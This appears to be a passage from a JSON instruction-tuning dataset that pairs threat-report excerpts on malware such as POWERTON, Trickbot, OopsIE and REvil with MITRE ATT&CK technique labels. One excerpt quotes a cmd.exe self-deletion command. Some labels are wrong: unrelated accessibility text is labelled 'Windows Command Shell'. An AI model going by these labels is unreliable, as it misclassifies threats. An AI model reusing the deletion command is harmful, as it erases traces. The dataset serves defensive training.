cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Snippets of HOLMIUM PowerShell backdoor (POWERTON) implementing two different persistence mechanisms: WMI event subscription (T1084) and Registry run keys or Startup folder (T1060", + "output": "- T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The ZIP archive contains a malicious portable executable (PE) file with embedded HTML application (HTA).\u00a0The user has to unzip the archive and double-click the executable for the infection chain to continue. The PE file is a simple HTA script compiled into an executable. When the user double-clicks the executable, the malicious HTA file is extracted to %temp% and executed by mshta.exe", + "output": "- T1204.002: User Execution - Malicious File\n- T1218.005: System Binary Proxy Execution - Mshta" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The two dropped artifacts \u2013 a payload DLL and a Word document \u2013 are written to the \u201cUsers\\<Log on User>\\\u201d folder (the document will replace the opened malicious document with clean stub after killing the running Word process", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. CTU researchers identified two versions of Daserf written in Visual C and Delphi. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. RarStar HTTP POST request. Use malware to upload the large list of enumerated files to the C2 server. When exfiltration is complete, the uploader (or Datper or xxmm) immediately uses the del command to delete the RAR archives. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Step 6: After obtaining the fully privileged handle of Taskmgr.exe, the actor uses this handle to execute cmd as high privilege process to execute install.bat", + "output": "- T1134.004: Access Token Manipulation - Parent PID Spoofing\n- T1218.011: System Binary Proxy Execution - Rundll32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The threat actors can execute remote commands by running this specialized module with predefined actions. This module attempts to execute a command. It uses the PowerShell Invoke-Expression method for the PowerShell-based module, while its C# implementation has both cmd and PowerShell options", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OFF ON Vision Impaired Profile Enhances website's visuals This profile adjusts the website, so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. This website utilizes various technologies that are meant to make it as accessible as possible at all times. We utilize an accessibility interface that allows persons with specific disabilities to adjust the website\u2019s UI (user interface) and design it to their personal needs. This application remediates the website\u2019s HTML, adapts its functionality and behavior for screen-readers used by blind users, and for keyboard functions used by individuals with motor impairments. In this process, we provide screen-readers with meaningful data using the ARIA set of attributes. It will also extract texts embedded within the image using an OCR (optical character recognition) technology. Vision Impaired Profile: this profile adjusts the website so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. Additional UI, design, and readability adjustments . 1) Font\u00a0adjustments \u2013\u00a0users can increase and decrease its size, change its family (type), adjust the spacing,\u00a0alignment, line height,\u00a0and more. 7) Additional functions\u00a0\u2013 we allow users to change cursor color and size, use a printing mode, enable a virtual keyboard, and many other functions. Still, we are continually improving our accessibility, adding, updating, improving its options and features, and developing and adopting new technologies", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. Messages are encrypted using AES with a static key. The versions used by APT10 (1.3.4.0, 2.0.0.0, and 2.0.0.1) are not available via the public GitHub page, indicating that APT10 has further customized the open source version. The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload. QUASARRAT is a fully functional .NET backdoor that has been used by multiple cyber espionage groups in the past", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NewBCtestDll, NewBCtestnDll Module that is a reverse proxy and is able to execute commands. Module that is a reverse proxy and is able to execute commands. vncDll Module used as a RAT on the victim machine. Module used as a RAT on the victim machine. vpnDll Module used to create VPN proxy routed to a given address. Module used to create VPN proxy routed to a given address. rdpscanDll Module used for brute forcing RDP on a certain list of targets. Module used for brute forcing RDP on a certain list of targets. bcClientDllTestTest An old module used to proxy Trickbot operator traffic through a victim machine. An old module used to proxy Trickbot operator traffic through a victim machine", + "output": "- T1219: Remote Access Software" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On June 21st, 2017 an attacker breached\u00a0one of our monitored systems by brute-forcing SSH credentials using two IPs known to be part of the TOR network", + "output": "- T1110: Brute Force" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and Outlook Web Access (OWA). The threat actors used the infrastructure of staging targets to connect to several intended targets", + "output": "- T1133: External Remote Services\n- T1114.002: Email Collection - Remote Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While investigating these files, we observed what we believe was active development on these .cmd files that helps illuminate the Gamaredon group\u2019s processes", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Attempt to get detailed information about the operating system and hardware, such as version, patches, hotfixes, service packs, and architecture (System Information Discovery [T1082]) - Enumerate files and directories or search in specific locations of a host or network share for particular information within a file system (File and Directory Discovery [T1083]) - Get a list of security software, configurations, defensive tools, and sensors installed on the system (Software Discovery: Security Software Discovery [T1518.001]) - Procure information about running processes on a system to understand standard software running on network systems (Process Discovery [T1057]) - Identify primary users, currently logged in users, sets of users that commonly use a system, or active or inactive users (System Owner/User Discovery [T1033]) - Enumerate browser bookmarks to learn more about compromised hosts, reveal personal information about users, and expose details about internal network resources (Browser Bookmark Discovery [T1217]) - Look for information on network configuration and system settings on compromised systems, or perform remote system discovery (System Network Configuration Discovery [T1016]) - Interact with the Windows Registry to gather information about the system, configuration, and installed software (Query Registry [T1012]) - Get a list of open application windows to learn how the system is used or give context to data collected (Application Window Discovery [T1010]) - Attempt to get a listing of local system or domain accounts in the compromised system (Account Discovery [T1087]) - Obtain a list of network connections to and from the compromised system or remote system by querying for information over the network (System Network Connections Discovery [T1049", + "output": "- T1217: Browser Information Discovery\n- T1518.001: Software Discovery - Security Software Discovery\n- T1033: System Owner/User Discovery\n- T1083: File and Directory Discovery\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BRONZE UNION uses various tools for credential theft. In one incident, the threat actor used the Wrapikatz tool (w.exe) with a usage statement that retrieves various passwords and Windows credentials from memory and compiles them in w.txt", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim\u2019s data", + "output": "- T1560: Archive Collected Data\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory\n- T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- T1003.004: OS Credential Dumping - LSA Secrets\n- T1555: Credentials from Password Stores\n- T1552.001: Unsecured Credentials - Credentials In Files\n- T1003.005: OS Credential Dumping - Cached Domain Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Static analysis of this executable shows only two functions, but a regular number of imports. Upon detecting a debugger attached to it, the malware will display the message below and terminate the execution. This packer also hides the calls to API functions. This time instead of using a dispatcher function, the malware pushes the arguments into the stack as usual but will then perform a call to a jump table built during the unpacking, in the .text section memory region. Each entry finishes with a jmp instruction into the respective API function. Effectively the malware doesn't do any call to API functions, it always performs a jump. The end result is the same has in the packer from 2016, but with a simpler mechanism. One of the anti-analysis features included in this packer is the lack of calls to API functions. In the early stages of execution, the malware loads the libraries and retrieves the addresses from functions it needs. Feature-wise, there is no change when compared with the 2016 version, in fact when compared the C2 beaconing functions even share some of the offsets", + "output": "- T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "File hunting plugin: The most frequently used plugin, similar to one used in 2014. Often used to collect Office files from temporary internet history. Detailed survey plugin: Used to gather domain membership, processes/loaded modules, hardware enumeration, installed products, logical and mapped drive information. Evolution of earlier plugin used in 2014. Browser plugin: Used to steal browser history, stored passwords and sessions. File listing plugin: Works on local or remote drives and can map additional paths when given credentials", + "output": "- T1082: System Information Discovery\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The \u2018vsnet\u2019 plugin was intended to spread and launch a payload (BlackEnergy2 dropper itself at the moment) in the local network by using PsExec, as well as gaining primary information on the user\u2019s computer and network", + "output": "- T1049: System Network Connections Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In one case, the attackers sent a malicious document which was nearly identical to a legitimate attachment which we observed later being sent to the same recipient", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The PlugX malware can be configured to use HTTP, DNS, raw TCP, or UDP to avoid network-based detection. In one sample analyzed by CTU researchers, PlugX was configured with hard-coded user credentials to bypass a proxy that required authentication. Newer HttpBrowser versions use SSL with self-signed certificates to encrypt network communications", + "output": "- T1071.001: Application Layer Protocol - Web Protocols\n- T1071.004: Application Layer Protocol - DNS\n- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Those files are then uploaded via unencrypted HTTP, one after another. Examining the network packets showed that they contained a string with two pieces of information: a file path and a random string of characters", + "output": "- T1071.001: Application Layer Protocol - Web Protocols\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "STOLEN INFO\u2019 message \u2013 bot message to C2 with stolen information like passwords, accounts, emails, etc. Stolen information is RC4 encrypted and Base64 encoded. The key for the RC4 encryption is generated in a different way and based on the infected system ID (aka Bot ID) values, and not based on a static string as in the case of traffic encryption", + "output": "- T1132.001: Data Encoding - Standard Encoding\n- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "mshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute install.bat with high privileges. To gain higher privileges mshlpweb.dll execute the Windows Update Standalone Installer, wusa.exe. This process runs as a high-integrity process by default, since its set to auto-elevate within its manifest", + "output": "- T1218.011: System Binary Proxy Execution - Rundll32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Before evidence of BlackEnergy2 use in targeted attacks was uncovered, we tracked strange activity on one of the BlackEnergy CnC servers in 2013. This strangeness\u00a0was related to values listed in newer\u00a0BlackEnergy configuration files. As described in Dmitry\u2019s 2010 Black DDoS\u2019 analysis, a configuration file is downloaded from the server by main.dll on an infected system. The config file provides download instructions for the loader. In this particular case in 2013, the config file included an unknown plugin set, aside from the usual \u2018ddos\u2019 plugin listing. Displayed below are these new, xml formatted plugin names \u201cweap_hwi\u201d, \u201cps\u201d, and \u201cvsnet\u201d in a BlackEnergy configuration file download from a c2 server. This new module push must have been among the first for this group, because all of the module versions were listed as \u201cversion 1\u201d, including the ddos plugin", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NOBELIUM has been observed modifying Azure AD to enable long-term persistence and access to sensitive information. This can include the creation of users, consent of Azure AD applications, granting of roles to users and applications, creation of additional service principal credentials, and more. In one incident, MSTIC observed the use of Azure RunCommand, paired with Azure admin-on-behalf-of (AOBO), as a technique to gain access to virtual machines and shift access from cloud to on-premise. NOBELIUM has demonstrated an ongoing interest in targeting privileged users, including Global Administrators. NOBELIUM is frequently observed conducting activities consistent with intelligence collection", + "output": "- T1087.004: Account Discovery - Cloud Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Next, REvil checks the configuration field dbg to see if it\u2019s running in debug mode. If that is not the case, geolocation checks based on the system\u2019s language and the keyboard layout are conducted so the ransomware does not attempt to encrypt files on whitelisted systems. The following are whitelisted system language IDs for the analyzed sample", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The group has the capability to set up phishing infrastructure to mimic well known websites and trick victims to enter their credentials. This is one of the main methods used by this actor to collect email addresses that later will be used to send spearphishing emails. The group is still using similar phishing models previously mentioned in the KISA report with some small changes", + "output": "- T1566.001: Phishing - Spearphishing Attachment\n- T1589.002: Gather Victim Identity Information - Email Addresses" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The export called \u201cSendDataToServer_2\u201d does exactly what the name means: it encrypts all collected data, encodes it using Base64 encoding and calls its additional library to send the data to the C2 server. The names of the C2 servers are hardcoded", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The user receives a phishing email with a ZIP attachment containing an Office document with embedded macros, the document itself or a link to download malicious document. The user opens the malicious attachment/link and is tricked into clicking \u201cEnable content\u201d. - A malicious macro is executed. One of the encrypted resources has the DLL binary (loader) which is decrypted later during runtime", + "output": "- T1204.002: User Execution - Malicious File\n- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Helminth relies on the following shortcut for persistence, as it runs the Trojan each time the system starts using the following command line", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies (T1090: Proxy) for pivoting. These tools included a fast reverse proxy (frp), Secure Socket Funneling (SSF), and Venom", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The use of the choice command, as seen below, did not appear in previous versions of OopsIE and appears to have been added in the most recent version used in this attack. cmd.exe /C choice /C Y /N /D Y /T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin. With the Trojan moved its final location, it will then create a scheduled task to run a VBScript to make sure it runs persistently. The Trojan accesses two resources, named Sch and VBS that contains obfuscated strings that contain the command to create the scheduled task and the VBScript to run. This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task. This process ultimately attempts to run the Trojan every three minutes, which is important as OopsIE relies on this scheduled task as it does not include a main loop to continue its execution. After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server. The process in which the Trojan communicates with its C2 server is very similar to the previous OopsIE Trojan that we discussed in our previous blog. Also, the oops string used to signify and erroneous transmission from the C2, which gave OopsIE its name is reversed to spoo. The command handler in this OopsIE variant is very similar to the previous version, as it contains the same three (1, 2 and 3) commands seen in Table 2", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Waterbear employs a modular approach to its malware. It utilizes a DLL loader to decrypt and execute an RC4-encrypted payload. Sometimes, the hardcoded file paths of the encrypted payloads are not under Windows native directories (e.g. It is also possible that the attackers use Waterbear as a secondary payload to help maintain presence after gaining some levels of access to the targets\u2019 systems. The evidence is that Waterbear frequently uses internal IPs as its own C&C servers (for instance,\u00a0b9f3a3b9452a396c3ba0ce4a644dd2b7f494905e820e7b1c6dca2fdcce069361 uses an internal IP address of\u00a010[.]0[.]0[.]211 as its C&C server", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. After 